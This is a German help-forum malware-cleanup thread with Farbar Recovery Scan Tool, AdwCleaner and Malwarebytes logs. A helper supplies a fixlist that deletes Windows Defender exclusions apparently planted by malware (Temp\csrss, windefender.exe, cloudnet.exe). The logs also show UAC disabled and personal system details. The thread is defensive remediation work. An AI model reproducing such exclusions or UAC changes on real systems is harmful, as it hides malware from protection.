2017-12-17 22:06 - 2017-12-17 22:06 - 000357256 _____ () C:\Windows\SysWOW64\GameManager32.dll
2018-01-02 19:30 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\SDL2.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 004969248 _____ () C:\Program Files (x86)\Steam\v8.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001563936 _____ () C:\Program Files (x86)\Steam\icui18n.dll
2018-01-02 19:30 - 2016-09-01 03:02 - 001195296 _____ () C:\Program Files (x86)\Steam\icuuc.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 002632480 _____ () C:\Program Files (x86)\Steam\video.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 005137696 _____ () C:\Program Files (x86)\Steam\libavcodec-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000847136 _____ () C:\Program Files (x86)\Steam\libavutil-55.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000695584 _____ () C:\Program Files (x86)\Steam\libavformat-57.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000351520 _____ () C:\Program Files (x86)\Steam\libavresample-3.dll
2018-01-02 19:30 - 2017-12-20 03:43 - 000783648 _____ () C:\Program Files (x86)\Steam\libswscale-4.dll
2018-01-02 19:30 - 2018-05-19 01:01 - 000979232 _____ () C:\Program Files (x86)\Steam\bin\chromehtml.DLL
2018-01-02 19:30 - 2016-07-05 00:17 - 000266560 _____ () C:\Program Files (x86)\Steam\openvr_api.dll
2018-01-02 19:31 - 2018-05-01 09:32 - 000788256 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\SDL2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 083524384 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\libcef.dll
2018-01-02 19:30 - 2015-09-25 01:52 - 000119208 _____ () C:\Program Files (x86)\Steam\winh264.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 002253600 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libglesv2.dll
2018-01-02 19:31 - 2018-05-14 21:39 - 000109856 _____ () C:\Program Files (x86)\Steam\bin\cef\cef.win7\swiftshader\libegl.dll

==================== Alternate Data Streams (Nicht auf der Ausnahmeliste) =========

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird nur der ADS entfernt.)


==================== Abgesicherter Modus (Nicht auf der Ausnahmeliste) ===================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Der Wert "AlternateShell" wird wiederhergestellt.)

HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Minimal\MBAMService => ""="Service"
HKLM\SYSTEM\CurrentControlSet\Control\SafeBoot\Network\MBAMService => ""="Service"

==================== Verknüpfungen (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird der Registryeintrag auf den Standardwert zurückgesetzt oder entfernt.)


==================== Internet Explorer Vertrauenswürdig/Eingeschränkt ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt.)


==================== Hosts Inhalt: ===============================

(Wenn benötigt kann der Hosts: Schalter in die Fixlist aufgenommen werden um die Hosts Datei zurückzusetzen.)

2009-07-14 04:34 - 2018-06-01 10:33 - 000000035 _____ C:\Windows\system32\Drivers\etc\hosts


==================== Andere Bereiche ============================

(Aktuell gibt es keinen automatisierten Fix für diesen Bereich.)

HKU\S-1-5-21-1284053026-2775073283-1402561352-1000\Control Panel\Desktop\\Wallpaper -> C:\Users\Nico\AppData\Roaming\Microsoft\Windows\Themes\TranscodedWallpaper.jpg
DNS Servers: 192.168.1.1
HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System => (ConsentPromptBehaviorAdmin: 0) (ConsentPromptBehaviorUser: 3) (EnableLUA: 0)
Windows Firewall ist aktiviert.

==================== MSCONFIG/TASK MANAGER Deaktivierte Einträge ==


==================== Firewall Regeln (Nicht auf der Ausnahmeliste) ===============

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er aus der Registry entfernt. Die Datei wird nicht verschoben solange sie nicht separat aufgelistet wird.)

FirewallRules: [TCP Query User{3BA89802-EE14-46F8-A794-2A739BF5F99A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [UDP Query User{C1155520-3B6F-4E4A-AC89-91381F99D08A}C:\program files\amd\cnext\cnext\radeonsettings.exe] => (Block) C:\program files\amd\cnext\cnext\radeonsettings.exe
FirewallRules: [{40E49BB6-ABF0-47CB-B218-019E701E0804}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AF5FA658-5740-4813-9449-2D931B2F3309}] => (Allow) C:\Program Files (x86)\Steam\Steam.exe
FirewallRules: [{AFEE751F-FF72-402F-8133-F76B7A82208B}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{24513EE5-D297-4D68-85F5-1CCB96F8D2E9}] => (Allow) C:\Program Files (x86)\Steam\bin\cef\cef.win7\steamwebhelper.exe
FirewallRules: [{D46D3F74-B919-457B-8B8B-3F642FECFF77}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [{8A83AE2D-91DB-427A-B27C-8C00514F265B}] => (Allow) C:\Program Files (x86)\Steam\steamapps\common\Counter-Strike Global Offensive\csgo.exe
FirewallRules: [TCP Query User{C08C2554-A723-4AE2-A5FF-7AF5B5B63745}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe
FirewallRules: [UDP Query User{94F28652-E20A-47DC-B119-43217FB92837}C:\program files\logitech gaming software\lcore.exe] => (Block) C:\program files\logitech gaming software\lcore.exe

==================== Wiederherstellungspunkte =========================

01-06-2018 00:17:39 Geplanter Prüfpunkt

==================== Fehlerhafte Geräte im Gerätemanager =============


==================== Fehlereinträge in der Ereignisanzeige: =========================

Applikationsfehler:
==================
Error: (06/01/2018 10:37:17 AM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 09:30:52 PM) (Source: Application Error) (EventID: 1000) (User: )
Description: Name der fehlerhaften Anwendung: AsusSetup.exe, Version: 2.0.20.2, Zeitstempel: 0x00000000
Name des fehlerhaften Moduls: unknown, Version: 0.0.0.0, Zeitstempel: 0x00000000
Ausnahmecode: 0x00000000
Fehleroffset: 0x00000000
ID des fehlerhaften Prozesses: 0x7b0
Startzeit der fehlerhaften Anwendung: 0x01d3f915e0c98213
Pfad der fehlerhaften Anwendung: C:\Windows\MEI\AsusSetup.exe
Pfad des fehlerhaften Moduls: unknown
Berichtskennung: 20bf9f77-6509-11e8-bc5e-10c37b6f5940

Error: (05/31/2018 09:30:48 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:28:49 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:18:19 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 04:06:36 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.

Error: (05/31/2018 02:19:46 PM) (Source: Application Hang) (EventID: 1002) (User: )
Description: Programm NOTEPAD.EXE, Version 6.1.7601.18917 kann nicht mehr unter Windows ausgeführt werden und wurde beendet. Überprüfen Sie den Problemverlauf in der Wartungscenter-Systemsteuerung, um nach weiteren Informationen zum Problem zu suchen.

Prozess-ID: ca4

Startzeit: 01d3f8d9a23650b5

Endzeit: 497

Anwendungspfad: C:\Windows\system32\NOTEPAD.EXE

Berichts-ID: e4a6dc91-64cc-11e8-9a9a-10c37b6f5940

Error: (05/31/2018 02:04:05 PM) (Source: Winlogon) (EventID: 4103) (User: )
Description: Fehler bei der Windows-Lizenzaktivierung. Fehler 0x80070005.


Systemfehler:
=============
Error: (06/01/2018 10:39:21 AM) (Source: Service Control Manager) (EventID: 7000) (User: )
Description: Der Dienst "Intel(R) Management and Security Application Local Management Service" wurde aufgrund folgenden Fehlers nicht gestartet:
Das System kann die angegebene Datei nicht finden.

Error: (06/01/2018 09:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 08:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 07:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 06:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 05:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 04:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert

Error: (06/01/2018 03:56:19 AM) (Source: Service Control Manager) (EventID: 7023) (User: )
Description: Der Dienst "SPP-Benachrichtigungsdienst" wurde mit folgendem Fehler beendet:
Zugriff verweigert


CodeIntegrity:
===================================

Date: 2018-06-01 10:37:35.824
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-06-01 09:52:51.030
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-31 21:31:05.188
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-31 16:47:31.273
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-28 16:16:44.753
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-28 15:33:27.596
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-27 11:36:38.184
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

Date: 2018-05-27 10:18:50.505
Description:
Die Abbildintegrität der Datei "\Device\HarddiskVolume2\Windows\System32\sxs.dll" konnte nicht überprüft werden, da der Satz seitenbezogener Abbildhashes auf dem System nicht gefunden wurde.

==================== Speicherinformationen ===========================

Prozessor: Intel(R) Core(TM) i5-4460 CPU @ 3.20GHz
Prozentuale Nutzung des RAM: 31%
Installierter physikalischer RAM: 8132.21 MB
Verfügbarer physikalischer RAM: 5555.02 MB
Summe virtueller Speicher: 16262.6 MB
Verfügbarer virtueller Speicher: 12726.03 MB

==================== Laufwerke ================================

Drive c: () (Fixed) (Total:931.41 GB) (Free:779.37 GB) NTFS

\\?\Volume{c6be1ac3-efc6-11e7-8a05-806e6f6e6963}\ (System-reserviert) (Fixed) (Total:0.1 GB) (Free:0.06 GB) NTFS

==================== MBR & Partitionstabelle ==================

========================================================
Disk: 0 (MBR Code: Windows 7/8/10) (Size: 931.5 GB) (Disk ID: E8A87806)
Partition 1: (Active) - (Size=100 MB) - (Type=07 NTFS)
Partition 2: (Not Active) - (Size=931.4 GB) - (Type=07 NTFS)

==================== Ende von Addition.txt ============================

moinbro 01.06.2018 09:57
Ich habe 2 mal schon geantwortet aber ich kann es hier nicht sehen, ist das normal?

M-K-D-B 01.06.2018 10:51
Servus,


ja, das mit dem 2x Posten ist ein Bug im Forum. Ist nicht schlimm. ;)

Dein Rechner sollte jetzt schon besser laufen...


Wir entfernen jetzt noch kleine Reste mit FRST und führen nochmal Kontrollen mit AdwCleaner und MBAM durch.

Danach sehen wir weiter. :)






Schritt 1
  • Kopiere den gesamten Inhalt der folgenden Code-Box:
    Code:
    Start::
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\rss
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\csrss
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\PatientSunset
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\windefender.exe
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\wup
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\System32\drivers
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe
    DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe
    ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
    Reboot:
    End::
  • Starte nun FRST und klicke direkt den Entfernen Button. Wichtig: Du brauchst den Inhalt der Code-Box nirgends einfügen, da sich FRST den Code aus der Zwischenablage holt!
  • Das Tool führt die gewünschten Schritte aus und erstellt eine fixlog.txt im selben Verzeichnis, in dem sich die FRST/FRST64.exe befindet.
  • Gegebenenfalls muss dein Rechner dafür neu gestartet werden.
  • Poste mir den Inhalt der fixlog.txt mit deiner nächsten Antwort.





Schritt 2
  • Schließe alle offenen Programme und Browser.
  • Starte die adwcleaner.exe mit einem Doppelklick.
  • Klicke auf Einstellungen, scrolle nach unten und vergewissere dich, dass die folgenden Punkte ausgewählt sind:
    • Tracing Schlüssel löschen
    • Prefetch-Dateien löschen
    • Proxy wiederherstellen
    • IE-Policies wiederherstellen
    • Chrome-Policies wiederherstellen
    • Winsock wiederherstellen
  • Klicke nun auf Dashboard, dann auf Jetzt scannen und warte bis der Suchlauf abgeschlossen ist.
  • Klicke nun auf Bereinigen & Reparieren und bestätige mit Jetzt bereinigen.
  • WICHTIG:
    Sollte AdwCleaner nichts finden, klicke auf Grundlegende Reparatur ausführen und anschließend auf Jetzt bereinigen.
  • Nach dem Neustart öffnet sich AdwCleaner automatisch. Klicke auf Log-Datei ansehen.
  • Poste mir deren Inhalt der Log-Datei mit deiner nächsten Antwort.
  • Die Logdatei findest du auch unter C:\AdwCleaner\Logs\AdwCleaner[Cxx].txt. (xx = fortlaufende Nummer).





Schritt 3
  • Starte Malwarebytes' Anti-Malware (MBAM).
  • Klicke im Anschluss auf Scan, wähle den Bedrohungs-Scan aus und klicke auf Scan starten.
  • Lass am Ende des Suchlaufs alle Funde (falls vorhanden) in die Quarantäne verschieben. Klicke dazu auf Ausgewählte Elemente in die Quarantäne verschieben.
  • Lass deinen Rechner ggf. neu starten, um die Bereinigung abzuschließen.
  • Starte MBAM nach dem Neustart, klicke auf Berichte.
  • Wähle den neuesten Scan-Bericht aus, klicke auf Bericht anzeigen und dann auf Export.
  • Wähle Textdatei (.txt) aus und speichere die Datei als mbam.txt auf dem Desktop ab.
  • Füge den Inhalt der mbam.txt mit deiner nächsten Antwort hinzu.





Schritt 4
  • Starte die FRST.exe erneut. Vergewissere dich, dass vor Addition.txt ein Haken gesetzt ist und drücke auf Untersuchen.
  • FRST erstellt wieder zwei Logdateien (FRST.txt und Addition.txt).
  • Poste mir beide Logdateien mit deiner nächsten Antwort.





Bitte poste mit deiner nächsten Antwort
  • die Logdatei des FRST-Fix,
  • die Logdatei von AdwCleaner,
  • die Logdatei von MBAM,
  • die zwei neuen Logdateien von FRST.

moinbro 01.06.2018 13:10
Fixlog

Code:
Entfernungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 13:32:41) Run:3
Gestartet von C:\Users\Nico\Desktop
Geladene Profile: Nico (Verfügbare Profile: Nico)
Start-Modus: Normal
==============================================

fixlist Inhalt:
*****************
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\rss
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\csrss
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Roaming\PatientSunset
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\windefender.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Users\Nico\AppData\Local\Temp\wup
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths|C:\Windows\System32\drivers
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|csrss.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|cloudnet.exe
DeleteValue: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes|windefender.exe
ExportKey: HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions
Reboot:

*****************

"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\rss" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Roaming\EpicNet Inc\CloudNet" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Local\Temp\csrss" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Roaming\PatientSunset" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\windefender.exe" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Users\Nico\AppData\Local\Temp\wup" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\\C:\Windows\System32\drivers" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\csrss.exe" => nicht gefunden
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\cloudnet.exe" => erfolgreich entfernt
"HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\\windefender.exe" => erfolgreich entfernt
================== ExportKey: ===================

[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Extensions]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths]
[HKLM\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes]

=== Ende von ExportKey ===


Das System musste neu gestartet werden.

==== Ende von Fixlog 13:32:41 ====
AdwCleaner

Code:
# -------------------------------
# Malwarebytes AdwCleaner 7.1.1.0
# -------------------------------
# Build:    04-27-2018
# Database: 2018-06-01.1
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    06-01-2018
# Duration: 00:00:01
# OS:      Windows 7 Ultimate
# Cleaned:  0
# Failed:  0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

No malicious folders cleaned.

***** [ Files ] *****

No malicious files cleaned.

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

No malicious registry entries cleaned.

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.


*************************

[+] Delete IFEO
[+] Delete Prefetch
[+] Delete Tracing Keys
[+] Reset BITS
[+] Reset Windows Firewall
[+] Reset Chromium Policies
[+] Reset IE Policies
[+] Reset Proxy Settings
[+] Reset Winsock

*************************


########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C01].txt ##########
mbam

Code:
Malwarebytes
www.malwarebytes.com

-Protokolldetails-
Scan-Datum: 01.06.18
Scan-Zeit: 14:00
Protokolldatei: 6ad9a7f4-6593-11e8-9ce0-10c37b6f5940.json
Administrator: Ja

-Softwaredaten-
Version: 3.5.1.2522
Komponentenversion: 1.0.365
Version des Aktualisierungspakets: 1.0.5330
Lizenz: Testversion

-Systemdaten-
Betriebssystem: Windows 7 Service Pack 1
CPU: x64
Dateisystem: NTFS
Benutzer: Nico-PC\Nico

-Scan-Übersicht-
Scan-Typ: Bedrohungs-Scan
Scan gestartet von: Manuell
Ergebnis: Abgeschlossen
Gescannte Objekte: 235071
Erkannte Bedrohungen: 0
(keine bösartigen Elemente erkannt)
In die Quarantäne verschobene Bedrohungen: 0
(keine bösartigen Elemente erkannt)
Abgelaufene Zeit: 0 Min., 39 Sek.

-Scan-Optionen-
Speicher: Aktiviert
Start: Aktiviert
Dateisystem: Aktiviert
Archive: Aktiviert
Rootkits: Deaktiviert
Heuristik: Aktiviert
PUP: Erkennung
PUM: Erkennung

-Scan-Details-
Prozess: 0
(keine bösartigen Elemente erkannt)

Modul: 0
(keine bösartigen Elemente erkannt)

Registrierungsschlüssel: 0
(keine bösartigen Elemente erkannt)

Registrierungswert: 0
(keine bösartigen Elemente erkannt)

Registrierungsdaten: 0
(keine bösartigen Elemente erkannt)

Daten-Stream: 0
(keine bösartigen Elemente erkannt)

Ordner: 0
(keine bösartigen Elemente erkannt)

Datei: 0
(keine bösartigen Elemente erkannt)

Physischer Sektor: 0
(keine bösartigen Elemente erkannt)

WMI: 0
(keine bösartigen Elemente erkannt)


(end)
Addition

Code:
Zusätzliches Untersuchungsergebnis von Farbar Recovery Scan Tool (x64) Version: 16.05.2018 01
durchgeführt von Nico (01-06-2018 14:06:57)
Gestartet von C:\Users\Nico\Downloads
Windows 7 Ultimate Service Pack 1 (X64) (2018-01-02 14:16:48)
Start-Modus: Normal
==========================================================


==================== Konten: =============================

Administrator (S-1-5-21-1284053026-2775073283-1402561352-500 - Administrator - Disabled)
ASPNET (S-1-5-21-1284053026-2775073283-1402561352-1002 - Limited - Enabled)
Gast (S-1-5-21-1284053026-2775073283-1402561352-501 - Limited - Disabled)
Nico (S-1-5-21-1284053026-2775073283-1402561352-1000 - Administrator - Enabled) => C:\Users\Nico

==================== Sicherheits-Center ========================

(Wenn ein Eintrag in die Fixlist aufgenommen wird, wird er entfernt.)

AV: Malwarebytes (Enabled - Up to date) {23007AD3-69FE-687C-2629-D584AFFAF72B}
AS: Malwarebytes (Enabled - Up to date) {98619B37-4FC4-67F2-1C99-EEF6D47DBD96}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}

==================== Installierte Programme ======================

(Nur Adware-Programme mit dem Zusatz "Hidden" können in die Fixlist aufgenommen werden, um sie sichtbar zu machen. Die Adware-Programme sollten manuell deinstalliert werden.)

Adobe Acrobat Reader DC - Deutsch (HKLM-x32\...\{AC76BA86-7AD7-1031-7B44-AC0F074E4100}) (Version: 18.011.20040 - Adobe Systems Incorporated)
Adobe Flash Player 29 NPAPI (HKLM-x32\...\Adobe Flash Player NPAPI) (Version: 29.0.0.171 - Adobe Systems Incorporated)
AMD Software (HKLM\...\AMD Catalyst Install Manager) (Version: 17.12.2 - Advanced Micro Devices, Inc.)
Cisco EAP-FAST Module (HKLM-x32\...\{64BF0187-F3D2-498B-99EA-163AF9AE6EC9}) (Version: 2.2.14 - Cisco Systems, Inc.) Hidden
Cisco LEAP Module (HKLM-x32\...\{51C7AD07-C3F6-4635-8E8A-231306D810FE}) (Version: 1.0.19 - Cisco Systems, Inc.) Hidden
Cisco PEAP Module (HKLM-x32\...\{ED5776D5-59B4-46B7-AF81-5F2D94D7C640}) (Version: 1.1.6 - Cisco Systems, Inc.) Hidden
Drakensang Online (HKLM-x32\...\Drakensang Online) (Version:  - )
Epic Games Launcher (HKLM-x32\...\{70843FAC-DA36-49CD-A9A1-6CB1665C9346}) (Version: 1.1.143.0 - Epic Games, Inc.)
Epic Games Launcher Prerequisites (x64) (HKLM\...\{66C5838F-B854-4A55-89E6-A6138747A4DF}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
Intel(R) Management Engine Components (HKLM\...\{1CEAC85D-2590-4760-800F-8DE5E91F3700}) (Version: 10.0.0.1204 - Intel Corporation)
Intel(R) Network Connections 19.1.51.0 (HKLM\...\PROSetDX) (Version: 19.1.51.0 - Intel)
Intel(R) USB 3.0 eXtensible Host Controller Driver (HKLM-x32\...\{240C3DDD-C5E9-4029-9DF7-95650D040CF2}) (Version: 3.0.0.16 - Intel Corporation)
Intel® Chipsatz-Gerätesoftware (HKLM-x32\...\{60c073df-e736-4210-9c3a-5fc2b651cef3}) (Version: 10.1.1.7 - Intel(R) Corporation) Hidden
KeePass Password Safe 2.38 (HKLM-x32\...\KeePassPasswordSafe2_is1) (Version: 2.38 - Dominik Reichl)
Launcher Prerequisites (x64) (HKLM-x32\...\{c6c5a357-c7ca-4a5f-9789-3bb1af579253}) (Version: 1.0.0.0 - Epic Games, Inc.) Hidden
League of Legends (HKLM-x32\...\League of Legends 1.0) (Version: 1.0 - Riot Games, Inc)
Logitech Gaming Software 8.96 (HKLM\...\Logitech Gaming Software) (Version: 8.96.88 - Logitech Inc.)
Malwarebytes Version 3.5.1.2522 (HKLM\...\{35065F43-4BB2-439A-BFF7-0F1014F2E0CD}_is1) (Version: 3.5.1.2522 - Malwarebytes)
Microsoft .NET Framework 1.1 (HKLM-x32\...\{CB2F7EDD-9D1F-43C1-90FC-4F52EAE172A1}) (Version: 1.1.4322 - Microsoft)
Microsoft .NET Framework 4.7.1 (Deutsch) (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1031) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft .NET Framework 4.7.1 (HKLM\...\{92FB6C44-E685-45AD-9B20-CADF4CABA132} - 1033) (Version: 4.7.02558 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x64) - 14.10.25008 (HKLM-x32\...\{f1e7e313-06df-4c56-96a9-99fdfd149c51}) (Version: 14.10.25008.0 - Microsoft Corporation)
Microsoft Visual C++ 2017 Redistributable (x86) - 14.10.25008 (HKLM-x32\...\{c239cea1-d49e-4e16-8e87-8c055765f7ec}) (Version: 14.10.25008.0 - Microsoft Corporation)
